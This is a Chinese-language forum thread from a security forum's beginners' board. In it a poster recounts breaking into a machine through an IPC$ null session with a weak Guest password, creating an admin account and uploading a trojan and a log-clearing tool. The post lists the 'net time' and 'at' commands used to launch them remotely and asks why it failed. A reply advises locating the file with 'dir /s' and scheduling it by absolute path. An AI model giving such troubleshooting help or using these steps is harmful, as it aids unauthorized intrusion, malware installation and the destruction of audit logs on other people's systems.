|
 | 作者: tiancefu [tiancefu]
 论坛用户 |
登录 |
| 我进入了一台机器,但是由于一些问题没有成功, 1,ipc$空连接成功(有弱口令Guest/空) 2,提升权限成功。 3新建帐号成功并提升权限成功(name/password) 4上传木马,清除日志工工具成功(上传到一共享文件夹下,不知在什么盘) 5远程启动遇到问提,我用: net time \\192.168.0.1(回车) 返回信息为下午4:10 at 4:15 \\192.168.0.1\downloads\muma.exe(downloads是一共享文件夹不知在 什么盘)(回车) 返回信息为新添任务ID=1 at 4:16 \\192.168.1\downloads\clearlog.exe(这一条命令也对吗????) 返回信息为新添任务ID=2 at 4:16 \\192.168.0.1\downloads\clearlog.exe 返回信息为新添任务ID=3 6,我等了好常时间(确定已经运行了)我用木马连接,但失败了。 7,我在运行中输入:\\192.168.0.1\downloads\ 8,不一会打开了,我看到我上传的muma.exe,clearlog.exe还在, 9,这可能没有执行,因为muma.exe运行是自动删除安装原文件的(我自己的机子 上试验过,执行后,muma.exe不见了。 10,下面又出错了: net use \\192.168.0.1\ipc$ (我本想断开远程连接,但忘记加 /delete了) 11,结果返回信息为命令完成。 12,然后我打上 net use \\192.168.0.1\ipc$ /delete 结果返回信息为IPc$已删除。 13,不久,我的机子有问题了,我重启了。 14回来后,我有打如下命令: net use \\192.168.0.1\ipc$ 结果返回信息为远程主机不能用一个以上用户连接,请断开远程连接或共享,重 新连接(具体我记不清了,但大意如此)这是怎么回事。 请高手指教, |
| 地主 发表时间: 05/16 06:41 |
 | 回复: laievf [laievf]  论坛用户 |
登录 |
|
可以用dir /s muma.exe查找你的文件放在哪了,然后就用绝对路径at吧 |
| B1层 发表时间: 05/16 14:22 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 求助所遇的问题